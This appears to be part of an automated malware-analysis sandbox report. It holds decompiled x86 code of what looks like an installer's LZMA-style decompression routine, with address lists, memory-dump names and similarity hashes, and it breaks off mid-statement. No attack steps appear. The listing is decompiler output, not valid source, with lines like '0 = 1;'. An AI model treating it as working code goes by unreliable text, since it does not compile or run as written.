                                                                                                                        												L163:
                                                                                                                        												 *(__ebp - 0x88) = 0x1b;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											L77:
                                                                                                                        											__eax =  *(__ebp - 0x14);
                                                                                                                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        												__eflags = __eax;
                                                                                                                        											}
                                                                                                                        											__edx =  *(__ebp - 8);
                                                                                                                        											__cl =  *(__eax + __edx);
                                                                                                                        											__eax =  *(__ebp - 0x14);
                                                                                                                        											 *(__ebp - 0x5c) = __cl;
                                                                                                                        											 *(__eax + __edx) = __cl;
                                                                                                                        											__eax = __eax + 1;
                                                                                                                        											__edx = 0;
                                                                                                                        											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                        											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        											__edx = _t275;
                                                                                                                        											__eax =  *(__ebp - 0x68);
                                                                                                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        											_t284 = __ebp - 0x64;
                                                                                                                        											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                        											__eflags =  *_t284;
                                                                                                                        											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        											L80:
                                                                                                                        											 *(__ebp - 0x14) = __edx;
                                                                                                                        											goto L81;
                                                                                                                        										case 0x1c:
                                                                                                                        											while(1) {
                                                                                                                        												L123:
                                                                                                                        												__eflags =  *(__ebp - 0x64);
                                                                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												L124:
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        													__eflags = __eax;
                                                                                                                        												}
                                                                                                                        												__edx =  *(__ebp - 8);
                                                                                                                        												__cl =  *(__eax + __edx);
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												 *(__ebp - 0x5c) = __cl;
                                                                                                                        												 *(__eax + __edx) = __cl;
                                                                                                                        												__eax = __eax + 1;
                                                                                                                        												__edx = 0;
                                                                                                                        												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        												__edx = _t414;
                                                                                                                        												__eax =  *(__ebp - 0x68);
                                                                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                        												__eflags =  *(__ebp - 0x30);
                                                                                                                        												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        												 *(__ebp - 0x14) = _t414;
                                                                                                                        												if( *(__ebp - 0x30) > 0) {
                                                                                                                        													continue;
                                                                                                                        												} else {
                                                                                                                        													L127:
                                                                                                                        													L81:
                                                                                                                        													 *(__ebp - 0x88) = 2;
                                                                                                                        													goto L1;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											L167:
                                                                                                                        											 *(__ebp - 0x88) = 0x1c;
                                                                                                                        											goto L170;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								L171:
                                                                                                                        								_t539 = _t538 | 0xffffffff;
                                                                                                                        								goto L172;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}















                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040610b
                                                                                                                        0x00406111
                                                                                                                        0x00406114
                                                                                                                        0x00406121
                                                                                                                        0x00406129
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004060e0
                                                                                                                        0x004060e0
                                                                                                                        0x004060e4
                                                                                                                        0x0040692f
                                                                                                                        0x0040692f
                                                                                                                        0x00000000
                                                                                                                        0x0040692f
                                                                                                                        0x004060ea
                                                                                                                        0x004060f0
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fe
                                                                                                                        0x00406101
                                                                                                                        0x00406104
                                                                                                                        0x00406109
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067a0
                                                                                                                        0x004067a0
                                                                                                                        0x004067a6
                                                                                                                        0x004067ac
                                                                                                                        0x004067b2
                                                                                                                        0x004067cc
                                                                                                                        0x004067cf
                                                                                                                        0x004067d5
                                                                                                                        0x004067e0
                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067ee
                                                                                                                        0x004067f2
                                                                                                                        0x004069a1
                                                                                                                        0x004069a1
                                                                                                                        0x00000000
                                                                                                                        0x004069a1
                                                                                                                        0x004067f8
                                                                                                                        0x004067fe
                                                                                                                        0x00406805
                                                                                                                        0x0040680d
                                                                                                                        0x00406810
                                                                                                                        0x00406813
                                                                                                                        0x00406813
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406131
                                                                                                                        0x00406131
                                                                                                                        0x00406133
                                                                                                                        0x00406136
                                                                                                                        0x004061a7
                                                                                                                        0x004061a7
                                                                                                                        0x004061aa
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x00000000
                                                                                                                        0x004061be
                                                                                                                        0x00406138
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x0040613f
                                                                                                                        0x00406141
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x00406159
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x0040616e
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406181
                                                                                                                        0x0040619f
                                                                                                                        0x0040619f
                                                                                                                        0x004061a1
                                                                                                                        0x00000000
                                                                                                                        0x00406183
                                                                                                                        0x00406183
                                                                                                                        0x00406183
                                                                                                                        0x00406186
                                                                                                                        0x00406189
                                                                                                                        0x0040618c
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x00406191
                                                                                                                        0x00406194
                                                                                                                        0x00406196
                                                                                                                        0x00406197
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x004063d0
                                                                                                                        0x004063d0
                                                                                                                        0x004063d4
                                                                                                                        0x004063f2
                                                                                                                        0x004063f2
                                                                                                                        0x004063f5
                                                                                                                        0x004063fc
                                                                                                                        0x004063ff
                                                                                                                        0x00406402
                                                                                                                        0x00406405
                                                                                                                        0x00406408
                                                                                                                        0x0040640b
                                                                                                                        0x0040640d
                                                                                                                        0x00406414
                                                                                                                        0x00406415
                                                                                                                        0x00406417
                                                                                                                        0x0040641a
                                                                                                                        0x0040641d
                                                                                                                        0x00406420
                                                                                                                        0x00406420
                                                                                                                        0x00406425
                                                                                                                        0x00000000
                                                                                                                        0x00406425
                                                                                                                        0x004063d6
                                                                                                                        0x004063d6
                                                                                                                        0x004063d9
                                                                                                                        0x004063dc
                                                                                                                        0x004063e6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040643a
                                                                                                                        0x0040643a
                                                                                                                        0x0040643e
                                                                                                                        0x00406461
                                                                                                                        0x00406464
                                                                                                                        0x00406467
                                                                                                                        0x00406471
                                                                                                                        0x00406440
                                                                                                                        0x00406440
                                                                                                                        0x00406443
                                                                                                                        0x00406446
                                                                                                                        0x00406449
                                                                                                                        0x00406456
                                                                                                                        0x00406459
                                                                                                                        0x00406459
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040647d
                                                                                                                        0x0040647d
                                                                                                                        0x00406481
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406487
                                                                                                                        0x00406487
                                                                                                                        0x0040648b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406491
                                                                                                                        0x00406491
                                                                                                                        0x00406493
                                                                                                                        0x00406497
                                                                                                                        0x00406497
                                                                                                                        0x0040649a
                                                                                                                        0x0040649e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064ee
                                                                                                                        0x004064ee
                                                                                                                        0x004064f2
                                                                                                                        0x004064f9
                                                                                                                        0x004064f9
                                                                                                                        0x004064fc
                                                                                                                        0x004064ff
                                                                                                                        0x00406509
                                                                                                                        0x00000000
                                                                                                                        0x00406509
                                                                                                                        0x004064f4
                                                                                                                        0x004064f4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x0040676d
                                                                                                                        0x0040676d
                                                                                                                        0x00406770
                                                                                                                        0x00406774
                                                                                                                        0x00406777
                                                                                                                        0x00406777
                                                                                                                        0x0040677a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406824
                                                                                                                        0x00406824
                                                                                                                        0x00406828
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x0040684d
                                                                                                                        0x00406854
                                                                                                                        0x0040685b
                                                                                                                        0x0040685b
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x0040686f
                                                                                                                        0x0040682a
                                                                                                                        0x0040682a
                                                                                                                        0x0040682d
                                                                                                                        0x00406830
                                                                                                                        0x00406833
                                                                                                                        0x0040683a
                                                                                                                        0x0040677e
                                                                                                                        0x0040677e
                                                                                                                        0x00406781
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406915
                                                                                                                        0x00406915
                                                                                                                        0x00406918
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x0040681f
                                                                                                                        0x00000000
                                                                                                                        0x0040654f
                                                                                                                        0x0040654f
                                                                                                                        0x00406551
                                                                                                                        0x00406558
                                                                                                                        0x00406559
                                                                                                                        0x0040655b
                                                                                                                        0x0040655e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x0040686f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x0040662d
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065af
                                                                                                                        0x004065b2

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                                        • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                                                        • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                                        • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00406767() {
                                                                                                                        				void _t533;
                                                                                                                        				signed int _t534;
                                                                                                                        				signed int _t535;
                                                                                                                        				signed int* _t605;
                                                                                                                        				void* _t612;
                                                                                                                        
                                                                                                                        				L0:
                                                                                                                        				while(1) {
                                                                                                                        					L0:
                                                                                                                        					if( *(_t612 - 0x40) != 0) {
                                                                                                                        						 *(_t612 - 0x84) = 0x13;
                                                                                                                        						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                        						goto L132;
                                                                                                                        					} else {
                                                                                                                        						__eax =  *(__ebp - 0x4c);
                                                                                                                        						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                        						__ecx =  *(__ebp - 0x58);
                                                                                                                        						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                        						L130:
                                                                                                                        						 *(__ebp - 0x58) = __eax;
                                                                                                                        						 *(__ebp - 0x40) = 3;
                                                                                                                        						L144:
                                                                                                                        						 *(__ebp - 0x7c) = 0x14;
                                                                                                                        						L145:
                                                                                                                        						__eax =  *(__ebp - 0x40);
                                                                                                                        						 *(__ebp - 0x50) = 1;
                                                                                                                        						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                        						L149:
                                                                                                                        						if( *(__ebp - 0x48) <= 0) {
                                                                                                                        							__ecx =  *(__ebp - 0x40);
                                                                                                                        							__ebx =  *(__ebp - 0x50);
                                                                                                                        							0 = 1;
                                                                                                                        							__eax = 1 << __cl;
                                                                                                                        							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                        							__eax =  *(__ebp - 0x7c);
                                                                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                                                                        							while(1) {
                                                                                                                        								L140:
                                                                                                                        								 *(_t612 - 0x88) = _t533;
                                                                                                                        								while(1) {
                                                                                                                        									L1:
                                                                                                                        									_t534 =  *(_t612 - 0x88);
                                                                                                                        									if(_t534 > 0x1c) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
                                                                                                                        										case 0:
                                                                                                                        											if( *(_t612 - 0x6c) == 0) {
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                        											_t534 =  *( *(_t612 - 0x70));
                                                                                                                        											if(_t534 > 0xe1) {
                                                                                                                        												goto L171;
                                                                                                                        											}
                                                                                                                        											_t538 = _t534 & 0x000000ff;
                                                                                                                        											_push(0x2d);
                                                                                                                        											asm("cdq");
                                                                                                                        											_pop(_t569);
                                                                                                                        											_push(9);
                                                                                                                        											_pop(_t570);
                                                                                                                        											_t608 = _t538 / _t569;
                                                                                                                        											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                        											asm("cdq");
                                                                                                                        											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                        											 *(_t612 - 0x3c) = _t603;
                                                                                                                        											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                        											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                        											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                        											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                        												L10:
                                                                                                                        												if(_t611 == 0) {
                                                                                                                        													L12:
                                                                                                                        													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                        													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                        													goto L15;
                                                                                                                        												} else {
                                                                                                                        													goto L11;
                                                                                                                        												}
                                                                                                                        												do {
                                                                                                                        													L11:
                                                                                                                        													_t611 = _t611 - 1;
                                                                                                                        													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                        												} while (_t611 != 0);
                                                                                                                        												goto L12;
                                                                                                                        											}
                                                                                                                        											if( *(_t612 - 4) != 0) {
                                                                                                                        												GlobalFree( *(_t612 - 4));
                                                                                                                        											}
                                                                                                                        											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                        											 *(_t612 - 4) = _t534;
                                                                                                                        											if(_t534 == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											} else {
                                                                                                                        												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                        												goto L10;
                                                                                                                        											}
                                                                                                                        										case 1:
                                                                                                                        											L13:
                                                                                                                        											__eflags =  *(_t612 - 0x6c);
                                                                                                                        											if( *(_t612 - 0x6c) == 0) {
                                                                                                                        												 *(_t612 - 0x88) = 1;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                        											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                        											_t45 = _t612 - 0x48;
                                                                                                                        											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                        											__eflags =  *_t45;
                                                                                                                        											L15:
                                                                                                                        											if( *(_t612 - 0x48) < 4) {
                                                                                                                        												goto L13;
                                                                                                                        											}
                                                                                                                        											_t546 =  *(_t612 - 0x40);
                                                                                                                        											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                                                        												L20:
                                                                                                                        												 *(_t612 - 0x48) = 5;
                                                                                                                        												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                        												goto L23;
                                                                                                                        											}
                                                                                                                        											 *(_t612 - 0x74) = _t546;
                                                                                                                        											if( *(_t612 - 8) != 0) {
                                                                                                                        												GlobalFree( *(_t612 - 8));
                                                                                                                        											}
                                                                                                                        											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                        											 *(_t612 - 8) = _t534;
                                                                                                                        											if(_t534 == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											} else {
                                                                                                                        												goto L20;
                                                                                                                        											}
                                                                                                                        										case 2:
                                                                                                                        											L24:
                                                                                                                        											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                        											 *(_t612 - 0x84) = 6;
                                                                                                                        											 *(_t612 - 0x4c) = _t553;
                                                                                                                        											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                        											goto L132;
                                                                                                                        										case 3:
                                                                                                                        											L21:
                                                                                                                        											__eflags =  *(_t612 - 0x6c);
                                                                                                                        											if( *(_t612 - 0x6c) == 0) {
                                                                                                                        												 *(_t612 - 0x88) = 3;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                        											_t67 = _t612 - 0x70;
                                                                                                                        											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                        											__eflags =  *_t67;
                                                                                                                        											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                        											L23:
                                                                                                                        											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                        											if( *(_t612 - 0x48) != 0) {
                                                                                                                        												goto L21;
                                                                                                                        											}
                                                                                                                        											goto L24;
                                                                                                                        										case 4:
                                                                                                                        											L133:
                                                                                                                        											_t531 =  *_t605;
                                                                                                                        											_t588 = _t531 & 0x0000ffff;
                                                                                                                        											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                        											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                        												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                        												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                        												 *(_t612 - 0x40) = 1;
                                                                                                                        												_t532 = _t531 - (_t531 >> 5);
                                                                                                                        												__eflags = _t532;
                                                                                                                        												 *_t605 = _t532;
                                                                                                                        											} else {
                                                                                                                        												 *(_t612 - 0x10) = _t564;
                                                                                                                        												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                        												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                        											}
                                                                                                                        											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                        												goto L139;
                                                                                                                        											} else {
                                                                                                                        												goto L137;
                                                                                                                        											}
                                                                                                                        										case 5:
                                                                                                                        											L137:
                                                                                                                        											if( *(_t612 - 0x6c) == 0) {
                                                                                                                        												 *(_t612 - 0x88) = 5;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                        											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                        											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                        											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                        											L139:
                                                                                                                        											_t533 =  *(_t612 - 0x84);
                                                                                                                        											goto L140;
                                                                                                                        										case 6:
                                                                                                                        											__edx = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x34) = 1;
                                                                                                                        												 *(__ebp - 0x84) = 7;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                        												goto L132;
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                        											__esi =  *(__ebp - 0x60);
                                                                                                                        											__cl = 8;
                                                                                                                        											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                        											__ecx =  *(__ebp - 0x3c);
                                                                                                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
